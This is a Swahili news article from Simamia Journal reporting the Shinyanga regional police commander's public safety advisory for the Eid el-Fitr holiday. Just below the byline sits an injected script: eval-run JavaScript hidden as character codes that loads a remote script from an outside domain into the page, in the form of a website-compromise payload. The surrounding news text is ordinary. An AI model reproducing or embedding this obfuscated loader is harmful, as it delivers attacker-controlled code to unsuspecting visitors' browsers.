Recent Comments

TAARIFA YA JESHI LA POLISI MKOANI SHINYANGA KUELEKEA SIKUKUU YA EID EL-FITR.

By Simamia Journal May 12, 2021
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Taaifa imetolewa kwa  Wananchi na Jamii ya Wakazi wote wa Mkoa wa Shinyanga kwa ujumla,katika kipindi hiki cha  kuelekea Sikukuu ya Eid-El-Fitr,ambapo Kamanda wa Jeshi hilo Mkoa wa Shinyanga Debora Mahgiligim ba ametoa taarifa hiyo kwa Vyombo vya Habari leo tarehe 12.05.2021, kwa ajili ya kufikishwa kwa jamii kuhusiana na mambo mbalimbali  ya Ulinzi na Usalama.

 

Kupitia taarifa hiyo, amesema “Awali ya yote, nipende kwanza kutoa Shukrani za dhati kwa Wananchi wote, Vyama vya Siasa, Makampuni Binafsi ya Ulinzi, Kamati ya Usalama Mkoa Shinyanga, Kamati za Usalama Wilaya zote, Taasisi mbalimbali za Serikali, Madhehebu ya Dini, Asasi za kiraia na Ninyi Wanahabari kwa ushirikiano mkubwa wa dhati mliouonesha katika kusimamia masuala ya Amani na Usalama hapa mkoani Shinyanga kwa kipindi chote mpaka hivi sasa”.

 

Tunapoelekea kipindi hiki cha kusherehekea Sikukuu ya Eid-El-Fitr, Jeshi la polisi mkoani hapa linatoa wito kwa wananchi wote kuwa makini katika kusherehekea Sikukuu hiyo kwa Amani na Utulivu pasipo vitendo ama viashiria vyovyote vya uvunjifu wa Amani, amesema..

 

Amewakumbusha kuwa  Wananchi wenye imani ya Kiislam na hata madhehebu mengine huutumia muda huo kwenda kuabudu  pamoja na muendelezo wa sherehe hizo kwenye maeneo mbalimbali ya starehe.

 

Hata hivyo,Uzoefu unaonesha kuwa baadhi ya watu hutumia kipindi hicho cha Sikukuu kama mwanya wa kufanya matukio ya Uhalifu kutokana na mikusanyiko ya watu.

 

Kutokana na hali hiyo, Kamanda Magiligimba amewaondoa hofu wananchi wote kuwa Jeshi la Polisi Mkoa wa Shinyanga, limejipanga kikamilifu kuhakikisha wananchi wote mkoani humo wanasherehekea Sikukuu kwa Amani na Utulivu kwani Ulinzi umeimarishwa maeneo yote ya Ibada, Mabwawa ya Kuogelea (Swimming Pool), sehemu za Kumbi za Starehe na Burudani, pamoja na maeneo mengine yote ya wazi yatakayokuwa na mikusanyiko mikubwa ya watu.

 

“Nawatahadharisha watumiaji wote wa barabara kuwa makini kwa kuzingatia Sheria za Usalama Barabarani, na hasa kwa madereva wa magari na pikipiki kuepuka kwenda mwendo kasi na kutumia vilevi wawapo kazini”. amesema

 

Aidha, Kamanda Magiligimba amesisitiza zaidi juu ya kuimarisha Usalama kwenye Kumbi za Starehe kwa kuwaasa wamiliki wa kumbi hizo kuhakikisha wanazingatia uhalali wa matumizi ya kumbi zao katika uingizaji wa watu, umri unaostahili na zaidi kujali uwezo wa ukumbi husika. Tabia za kimazoea zikiwemo zile za kuendekeza tamaa za kifedha na kujaza watu ukumbini kupita kiasi pamoja na disco toto ni marufuku na hatua kali za kisheria zitachukuliwa mara moja kwa yeyote atakayethubutu kufanya hivyo.

 

Amewaasa na kuwasisitiza Wazazi, Walezi na Jamii kwa ujumla kuendelea kuwa makini zaidi na uangalizi wa watoto wao, watoto wa majirani na watoto wa jamii kwa ujumla, waepuke kuwaacha wakitembea peke yao au wakati mwingine kuzurura barabarani na maeneo mengine ili kuepuka ajali na maafa au matukio mengine yanayoweza kusababisha madhara kwa watoto wetu.

 

Pia, ametoa wito kwa wananchi watakaolazimika kutoka katika makazi yao kwenda katika ibada au kwenda katika sehemu mbalimbali za starehe, wahakikishe kuwa hawaziachi Nyumba/makazi yao wazi au pasipo uangalizi na watoe taarifa kwa majirani zao, niwasisitize wananchi wote kwa kuendelea kushirikiana na Jeshi la Polisi kwa kutoa taarifa mapema pale watakapowatilia mashaka watu wasiowafahamu/wanaowafahamu kuwa wahalifu pindi watakapowabaini katika maeneo yao ili hatua stahiki ziweze kuchukuliwa haraka iwezekanavyo.

 

“Nitumie fursa hii muhimu kuwatakia wananchi wote Mkoa wa Shinyanga, SikuKuu njema ya Eid-El-Fitr kwa kuwahakikishia kuwa Jeshi la Polisi linatekeleza majukumu yake kwa kuzingatia Sheria, Taratibu na Kanuni zilizowekwa, pamoja na Miongozo mbalimbali inayotolewa mara kwa mara. Hivyo, halitawajibika kumwonea muhali, huruma ama Upendeleo mtu yeyote atakeyekwenda kinyume na Sheria” amehitimisha kwa kuwashukuru wananchi na kuwataka kuzingatia maelekezo ya taarifa hiyo.

By Simamia Journal

Tangaza nasi. www.simamia.com YouTube Chanel: www.youtube.com/c/SimamiaTv